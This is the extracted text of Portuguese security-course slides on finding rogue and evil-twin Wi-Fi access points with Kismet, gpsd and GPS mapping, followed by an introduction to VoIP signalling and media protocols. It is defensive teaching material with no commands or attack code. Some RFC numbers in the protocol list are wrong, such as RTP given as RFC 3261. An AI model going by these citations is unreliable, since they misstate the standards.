Ex: IPSEC, SSL, etc. • Realizar Penetration Tests • Localizar e remover o Rogue AP e o Evil Twin “É impossível estar totalmente seguro. O segredo é: dificultar tanto a vida de um possível atacante de modo que o investimento para invadir a rede seja maior que a motivação para fazê-lo” Marcos Flávio Araújo Assunção Localizar Rogue AP - Trilateração Marcos Flávio Araújo Assunção Localizar Rogue AP - Trilateração Ekahau HeatMapper Não serve para localizar um Evil Twin Marcos Flávio Araújo Assunção Localizar Evil Twin - GPSD Usando o gpsd (gps daemon) para inicializar o GPS USB. É necessário fazê-lo antes de abrir o Kismet Marcos Flávio Araújo Assunção Localizar Evil Twin – Kismet + GPS Acima, os dados de localização capturados pelo GPS. Marcos Flávio Araújo Assunção Localizar Evil Twin - Giskismet O Giskismet está exportando os dados gerados para o Kismet para um formato que pode ser aberto no Google Maps/Earth. Marcos Flávio Araújo Assunção Localizar Evil Twin – Google Maps Dados de localização dos Access Points Marcos Flávio Araújo Assunção Localizou Evil Twin? Pega rex! Marcos Flávio Araújo Assunção Vulnerabilidades de Voz sobre IP (VoIP) Marcos Flávio Araújo Assunção - VoIP é um conjunto de tecnologias que permite que chamadas de voz sejam feitas através da internet - Possibilita realização de chamadas de baixo custo, ou até mesmo gratuitas. - Redução de custos com infra-estrutura. - Acrescenta novas funcionalidades ao serviço telefônico VOIP Marcos Flávio Araújo Assunção Vulnerabilidades do VOIP Marcos Flávio Araújo Assunção Protocolos Protocolos de Sinalização Responsáveis por iniciar, monitorar, modificar e terminar chamadas VoIP. - SIP (Session Intitation Protocol ) - RFC 3261 - SDP (Session Description Protocol) – RFC 4566 - MGCP (Media Gateway Control Protocol) – RFC 3435 - Megaco / H.248 – RFC 3525 Marcos Flávio Araújo Assunção Protocolos Protocolos de Mídia Responsáveis por transportar o fluxo de mídia (Voz ou imagens) - RTP (Real Time Protocol ) - RFC 3261 - RTCP (Real Time Control Protocol) – RFC 3605 - SRTP / ZRTP Marcos Flávio Araújo Assunção Protocolos
Compartilhar